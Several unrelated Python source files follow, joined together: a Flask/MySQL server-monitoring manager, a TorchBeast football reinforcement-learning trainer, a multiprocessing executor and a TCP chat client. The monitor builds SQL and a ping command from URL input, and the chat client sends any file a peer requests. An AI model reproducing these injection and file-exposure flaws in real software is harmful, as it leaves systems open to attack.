db_pass = config.get('Storage', 'Pass', fallback='password')
err_type = 'Storage > Database'
db_name = config.get('Storage', 'Database', fallback='agent')
err_type = 'Storage > Prefix'
db_prefix = config.get('Storage', 'Prefix', fallback='am')
# collector
err_type = 'Collector > Interval'
interval_time = config.getint('Collector', 'Interval', fallback=1)
# flask connection info
err_type = 'UI_Feeder > Host'
flsk_host = config.get('UI_Feeder', 'Host', fallback='0.0.0.0')
err_type = 'UI_Feeder > Port'
flsk_port = config.getint('UI_Feeder', 'Port', fallback=5001)
except IOError as e:
print('CONFIG ERROR: Unable to load values from \"{}\"! STACKTRACE: {}'.format(err_type, e.args[1]))
print('CONFIG ERROR: Force closing program...')
exit()
# prepare logging
try:
logger = logging.getLogger('AtomicMonitor Central-Manager')
logger.setLevel(logging.DEBUG)
logger.addHandler(handlers.RotatingFileHandler(log_file, maxBytes=log_size_limit,
backupCount=log_file_number_limit))
ch = logging.StreamHandler()
ch.setFormatter(logging.Formatter('%(asctime)s | %(levelname)-8s | %(topic)-5s | %(message)s'))
logger.addHandler(ch)
except IOError as e:
print('FILE ERROR: Unable to prepare log file! STACETRACE: {}'.format(e.args[1]))
print('FILE ERROR: Force closing program...')
exit()
# setup flask
app = Flask(__name__)
# prepare database connection
con = None
cur = None
filterwarnings('ignore', category=pymysql.Warning)
# ping test server
def ping_server(host):
# ping server
result = pexpect.spawn('ping -c 1 {}'.format(host))
try:
# retrieve ping time
p = result.readline()
time_ping = float(p[p.find('time=') + 5:p.find(' ms')])
# ping time
return time_ping
except ValueError:
# ping time
return -1
# scrape data from each agent (server)
def scrape_data(time):
while True:
# retrieve list of servers
servers = list()
try:
# get list of servers
for row in cur.execute('SELECT * FROM {}_server'.format(db_prefix)):
servers.append(Server(row[0], row[1], row[2], row[3], row[4], row[5]))
# go through each server and scrape data
for serv in servers:
ping_result = ping_server(serv.host)
if ping_result is not -1:
try:
# sniff up data from a server
with urlopen('http://{}:{}/'.format(serv.host, serv.port)) as url:
data = json.loads(url.read().decode())
# insert data to SQL db
db_management.insert_ping_data(serv.id, 1, ping_result)
if ping_result > 200:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'Slow ping response: {} ms'.format(ping_result))
# insert ram data to SQL db
db_management.insert_memory_data(logging, con, cur, serv.id, 1,
data['memory']['ram']['percent_used'],
data['memory']['ram']['used'],
data['memory']['ram']['total'],
data['memory']['swap']['percent_used'],
data['memory']['swap']['used'],
data['memory']['swap']['total'])
if data['memory']['ram']['percent_used'] >= 90:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High RAM usage: {}%'.format(
data['memory']['ram']['percent_used']))
# insert CPU data to SQL db
db_management.insert_cpu_data(logging, con, cur, serv.id, 1, data['cpu']['percent_used'])
if data['cpu']['percent_used'] >= 90:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High CPU usage: {}%'.format(data['cpu']['percent_used']))
# insert network data to SQL db
for net_nic in data['network']:
db_management.insert_net_data(logging, con, cur, serv.id, 1, net_nic['name'],
net_nic['mb_sent'], net_nic['mb_received'])
# insert load average data to SQL db
db_management.insert_load_data(logging, con, cur, serv.id, 1, data['load']['1min'],
data['load']['5min'], data['load']['15min'])
if data['load']['1min'] is not None:
if data['load']['1min'] > 1.00:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High 1m load usage: {}'.format(data['load']['1min']))
elif data['load']['5min'] > 1.00:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High 5m load usage: {}'.format(data['load']['5min']))
elif data['load']['15min'] > 1.00:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High 15m load usage: {}'.format(
data['load']['15min']))
# insert disk data to SQL db
for disk in data['disks']['list']:
db_management.insert_disk_data(logging, con, cur, serv.id, 1, disk['device'],
disk['percent_used'], disk['used'], disk['total'])
if disk['percent_used'] > 90:
db_management.insert_log_data(logging, con, cur, serv.name, 0,
'High disk space usage: {}%'.format(
disk['percent_used']))
logging.info('Retrieved and logged data for server [{}]!'.format(serv.name),
extra={'topic': 'CM'})
except pymysql.Error:
logging.error('Unable to access server [{}]! Please make sure the port is open on that '
'server!'.format(serv.name), extra={'topic': 'AGENT'})
else:
db_management.insert_ping_data(serv.id, 0)
db_management.insert_memory_data(serv.id, 0)
db_management.insert_cpu_data(serv.id, 0)
db_management.insert_net_data(serv.id, 0)
db_management.insert_load_data(serv.id, 0)
db_management.insert_disk_data(serv.id, 0)
db_management.insert_log_data(serv.name, 1, 'Server not responding to ping')
logging.warning('Server [{}] is not responding, skipping...'.format(serv.name),
extra={'topic': 'CM'})
except pymysql.Error as ex:
logging.error('Problem when trying to retrieve data from SQL database! STACKTRACE: {}'.format(ex.args[1]),
extra={'topic': 'SQL'})
logging.error('Force closing program...', extra={'topic': 'SQL'})
exit()
time.sleep(time)
# start Flask service: retrieve now status from a server
@app.route('/now/<hostname>/<port>')
def web_now_status(hostname, port):
ping_result = ping_server(hostname)
if ping_result is not -1:
# access central-manager process
with urlopen('http://{}:{}/now'.format(hostname, port)) as url:
r = json.loads(url.read().decode())
# get data
ram_percent = r['ram']['percent_used']
cpu_percent = r['cpu']['percent_used']
boot_time = r['boot']['start_timestamp']
disk_io = r['disk_io']
# create json data
json_data = {
'status': 'online',
'ping': ping_result,
'ram_percent': ram_percent,
'cpu_percent': cpu_percent,
'boot_time': boot_time,
'disk_io': disk_io
}
logging.info('Retrieved now status for host {}:{} for IP: {}'.format(hostname, port, request.remote_addr),
extra={'topic': 'CM'})
# print json data
return jsonify(json_data)
else:
# create json data
json_data = {
'status': 'offline'
}
# print json data
return jsonify(json_data)
# start Flask service: retrieve list of servers
@app.route('/servers')
def web_servers():
servers = list()
# access database to retrieve servers
try:
# retrieve data
for row in cur.execute('SELECT * FROM {}_server'.format(db_prefix)):
servers.append(Server(row[0], row[1], row[2], row[3], row[4], row[5]))
names, types, modes, hosts, ports = [], [], [], [], []
for server in servers:
names.append(server.get_name())
types.append(server.get_type())
modes.append(server.get_mode())
hosts.append(server.get_host())
ports.append(server.get_ports())
# create json data
json_data = [
{
'name': name,
'type': typ,
'mode': mode,
'host': host,
'port': port
}
for name, typ, mode, host, port in zip(names, types, modes, hosts, ports)
]
logging.info('Retrieved all servers data for IP: {}'.format(request.remote_addr), extra={'topic': 'CM'})
# print json data
return jsonify(json_data)
except pymysql.Error as ex:
logging.error('Error when trying to retrieve data from the database! STACKTRACE: {}'.format(ex.args[1]),
extra={'topic': 'SQL'})
logging.error('Force closing program...', extra={'topic': 'SQL'})
exit()
# start Flask service: retrieve latest errors
@app.route('/errors/<count>')
def web_errors(count):
errors = list()
# access database to retrieve errors
try:
# retrieve data
for row in cur.execute('(SELECT * FROM {}_log ORDER BY id DESC LIMIT {}) ORDER BY id DESC'.format(db_prefix,
count)):
errors.append(ErrorLog(row[1], row[2], row[3], row[4]))
servernames, timestamps, types, msgs = [], [], [], []
for error in errors:
servernames.append(error.get_servername())
timestamps.append(error.get_timestamp())
types.append(error.get_type())
msgs.append(error.get_msg())
# create json data
json_data = [
{
'server_name': server_name,
'timestamp': timestamp,
'type': typ,
'msg': msg
}
for server_name, timestamp, typ, msg in zip(servernames, timestamps, types, msgs)
]
logging.info('Retrieved all {} error data for IP: {}'.format(count, request.remote_addr), extra={'topic': 'CM'})
# print json data
return jsonify(json_data)
except pymysql.Error as ex:
logging.error('Error when trying to retrieve data from the database! STACKTRACE: {}'.format(ex.args[1]),
extra={'topic': 'SQL'})
logging.error('Force closing program...', extra={'topic': 'SQL'})
exit()
# main "method"
if __name__ == '__main__':
# check to make sure the database has the required tables
logging.info('Starting program...', extra={'topic': 'CM'})
try:
# initiate connection
con, cur = db_management.connect_to_db(logging, db_host, db_port, db_user, db_pass, db_name)
# NSA'ing through tables in database
db_management.check_tables(logging, con, cur)
except pymysql.Error as e:
logging.error('Error when trying to connect to the database OR check/create table! STACKTRACE: {}'
.format(e.args[1]), extra={'topic': 'SQL'})
logging.error('Force closing program...', extra={'topic': 'SQL'})
exit()
# start scraping thread job!
logging.info('Starting scraping thread...', extra={'topic': 'CM'})
thd = Thread(target=scrape_data, args=(interval_time, ))
thd.daemon = True
thd.start()
logging.info('Scrape thread started!', extra={'topic': 'CM'})
# start Flask service
logging.info('Starting Flask service...', extra={'topic': 'CM'})
app.run(host=flsk_host, port=flsk_port)
|
monobeast_football.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from torchbeast import football_wrappers
from torchbeast.core import environment
from torchbeast.core import file_writer
from torchbeast.core import prof
from torchbeast.core import vtrace
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="11_vs_11_kaggle",
help="GFootball environment.")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
parser.add_argument('--load_checkpoint_weights', default=None,
help="Load model weights from a checkpoint")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
def act(
flags,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = prof.Timings() # Keep track of how fast things are.
gym_env = create_env(flags)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = environment.Environment(gym_env)
env_output = env.initial()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(flags.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
timings.time("model")
env_output = env.step(agent_output["action"])
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
def get_batch(
flags,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(flags.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def learn(
flags,
actor_model,
model,
batch,
initial_agent_state,
optimizer,
scheduler,
lock=threading.Lock(), # noqa: B008
):
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * flags.discounting
vtrace_returns = vtrace.from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(model.state_dict())
return stats
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
T = flags.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.bool),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(flags.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
def train(flags): # pylint: disable=too-many-branches, too-many-statements
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
plogger = file_writer.FileWriter(
xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
)
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
env = create_env(flags)
model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)
if flags.load_checkpoint_weights is not None:
logging.info(f"Loading model weights from {flags.load_checkpoint_weights}")
initial_checkpoint = torch.load(os.path.join(flags.load_checkpoint_weights, 'model.tar'), map_location="cpu")
model.load_state_dict(initial_checkpoint["model_state_dict"])
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, flags.use_lstm
).to(device=flags.device)
if flags.load_checkpoint_weights is not None:
learner_model.load_state_dict(model.state_dict())
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal step, stats
timings = prof.Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
stats = learn(
flags, model, learner_model, batch, agent_state, optimizer, scheduler
)
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
def checkpoint():
if flags.disable_checkpoint:
return
logging.info("Saving checkpoint to %s", checkpointpath)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"flags": vars(flags),
},
checkpointpath,
)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
if timer() - last_checkpoint_time > 10 * 60: # Save every 10 min.
checkpoint()
last_checkpoint_time = timer()
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
return # Try joining actors then quit.
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
checkpoint()
plogger.close()
def test(flags, num_episodes: int = 10):
if flags.xpid is None:
checkpointpath = "./latest/model.tar"
else:
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
gym_env = create_env(flags)
env = environment.Environment(gym_env)
model = Net(gym_env.observation_space.shape, gym_env.action_space.n, flags.use_lstm)
model.eval()
checkpoint = torch.load(checkpointpath, map_location="cpu")
model.load_state_dict(checkpoint["model_state_dict"])
observation = env.initial()
returns = []
while len(returns) < num_episodes:
if flags.mode == "test_render":
env.gym_env.render()
agent_outputs = model(observation)
policy_outputs, _ = agent_outputs
observation = env.step(policy_outputs["action"])
if observation["done"].item():
returns.append(observation["episode_return"].item())
logging.info(
"Episode ended after %d steps. Return: %.1f",
observation["episode_step"].item(),
observation["episode_return"].item(),
)
env.close()
logging.info(
"Average returns over %i steps: %.1f", num_episodes, sum(returns) / len(returns)
)
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = (~inputs["done"]).float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
Net = AtariNet
def create_env(flags):
return football_wrappers.wrap_pytorch(
football_wrappers.wrap_football(
football_wrappers.make_football(flags.env),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
def main(flags):
if flags.mode == "train":
train(flags)
else:
test(flags)
if __name__ == "__main__":
flags = parser.parse_args()
main(flags)
|
async_executor.py
|
from multiprocessing import Process
from multiprocessing import Manager
import multiprocessing
import numpy as np
from progressbar.bar import ProgressBar
class AsyncExecutor:
def __init__(self, n_jobs=1):
self.num_workers = n_jobs if n_jobs > 0 else multiprocessing.cpu_count()
self._pool = []
self._populate_pool()
def run(self, target, *args_iter, verbose=False):
workers_idle = [False] * self.num_workers
tasks = list(zip(*args_iter))
n_tasks = len(tasks)
if verbose:
pbar = ProgressBar(max_value=n_tasks)
while not all(workers_idle):
for i in range(self.num_workers):
if not self._pool[i].is_alive():
self._pool[i].terminate()
if len(tasks) > 0:
if verbose:
pbar.update(n_tasks-len(tasks))
#print(n_tasks-len(tasks))
next_task = tasks.pop(0)
self._pool[i] = _start_process(target, next_task)
else:
workers_idle[i] = True
if verbose:
pbar.finish()
def _populate_pool(self):
self._pool = [_start_process(_dummy_fun) for _ in range(self.num_workers)]
class LoopExecutor:
def run(self, target, *args_iter, verbose=False):
tasks = list(zip(*args_iter))
n_tasks = len(tasks)
if verbose:
pbar = ProgressBar(max_value=n_tasks)
for i, task in enumerate(tasks):
target(*task)
if verbose:
pbar.update(i+1)
def execute_batch_async_pdf(pdf_fun, X, Y, n_jobs=-1, batch_size=None):
"""
Executes pdf_fun in batches in multiple processes and concatenates results along axis 0
Args:
pdf_fun: callable with signature pdf(X, Y) returning a numpy array
X: ndarray with shape (n_queries, ndim_x)
Y: ndarray with shape (n_queries, ndim_y)
n_jobs: integer denoting the number of jobs to launch in parallel. If -1
it uses the CPU count
batch_size: (optional) integer denoting the batch size for the individual function calls
Returns:
ndarray of shape (n_queries,) which results from a concatenation of all pdf calls
"""
# split query arrays into batches
query_length = X.shape[0]
if n_jobs < 1:
n_jobs = max(multiprocessing.cpu_count(), 8)
if batch_size is None:
n_batches = n_jobs
else:
n_batches = query_length // batch_size + int(not (query_length % batch_size == 0))
X_batches, Y_batches, indices = _split_into_batches(X, Y, n_batches)
# prepare multiprocessing setup
manager = Manager()
result_dict = manager.dict()
def run_pdf_async(X_batch, Y_batch, batch_idx):
p = pdf_fun(X_batch, Y_batch)
result_dict[batch_idx] = p
# compute pdf for batches asynchronously
executer = AsyncExecutor(n_jobs=n_jobs)
executer.run(run_pdf_async, X_batches, Y_batches, indices)
# concatenate results
p_final = np.concatenate([result_dict[i] for i in indices], axis=0)
assert p_final.shape[0] == query_length
return p_final
def _split_into_batches(X, Y, n_batches):
assert X.shape[0] == X.shape[0]
if n_batches <= 1:
return [X], [Y], range(1)
else:
return np.array_split(X, n_batches, axis=0), np.array_split(Y, n_batches, axis=0), range(n_batches)
""" helpers """
def _start_process(target, args=None):
if args:
p = Process(target=target, args=args)
else:
p = Process(target=target)
p.start()
return p
def _dummy_fun():
pass
|
cliente_tcp.py
|
#!/usr/bin/python3
from socket import *
import threading
from threading import Thread
from time import sleep
import sys, ssl
lock = threading.Lock()
RECV_BUFFER = 2024
global writer
chatting = False
def envia(mensagem, sock):
lock.acquire()
sock.send( mensagem.encode('utf-8') )
lock.release()
class Heartbeat(object):
def __init__(self, sock, time):
self.on = True
self.beating = False
self.delay = time
self.sock = sock
def beat(self):
while self.on:
if( self.beating ):
envia("HB", self.sock)
sleep(self.delay)
class ListenerSocket(object):
def __init__(self):
self.on = True
def listen(self):
global chatting
global writer
while self.on:
chatfd, chataddr = listener.accept()
print (chataddr)
while 1:
data = chatfd.recv(RECV_BUFFER).decode('utf-8')
if (len(data) == 0):
continue
if (data.split()[0] == "CONN"):
chatting = True
buddyip = data.split()[1]
buddyport = (int)(data.split()[2])
buddy = data.split()[3]
writer = TCPWriter(buddyip,buddyport)
writer.connect()
print("You are connected to %s."% buddy)
print(chatting)
elif (data.split()[0] == "FILE"):
file_path = data.split()[1]
writer.send("SENDING %s" % file_path)
print("Enviando arquivo --%s--"% file_path)
writer.send_file( file_path )
sleep(0.1)
writer.send("SENT %s" % file_path)
continue
elif (data.split()[0] == "SENDING"):
print ("Comecou a receber arquivo.")
arq = open(data.split()[1], 'wb')
while 1:
data = chatfd.recv(RECV_BUFFER)
print("data eh --%s--" % data)
lista_split = data.split()
if( len(lista_split)>0 and lista_split[0] == b"SENT"):
break
if( not data or len(lista_split)==0 or lista_split[0] == "SENT"):
break
arq.write(data)
arq.close()
print ("Recebeu arquivo inteiro.")
continue
elif (data.split()[0] == "DISCONNECT"):
writer.disconnect()
break
else:
print (data)
class TCPWriter(object):
def __init__(self,buddy_ip,buddy_port):
self.ip = buddy_ip
self.port = buddy_port
self.socket = socket(AF_INET, SOCK_STREAM)
def connect(self):
global chatting
self.socket.connect((self.ip, self.port))
chatting = True
def disconnect(self):
global chatting
print("Seu chat foi encerrado.")
self.socket.close()
chatting = False
def send(self,message):
envia(message, self.socket)
def send_file(self, file_path):
arq = open(file_path, 'rb')
for line in arq.readlines():
lock.acquire()
self.socket.send( line )
lock.release()
arq.close()
print("Terminou de enviar o arquivo.")
if( len(sys.argv)<=1 or len(sys.argv)>4):
print( "Usage: ./cliente.py ip porta chat_port" )
sys.exit(0)
serverName = sys.argv[1]
serverPort = int(sys.argv[2])
chatPort = int(sys.argv[3])
clientSocket = socket(AF_INET, SOCK_STREAM)
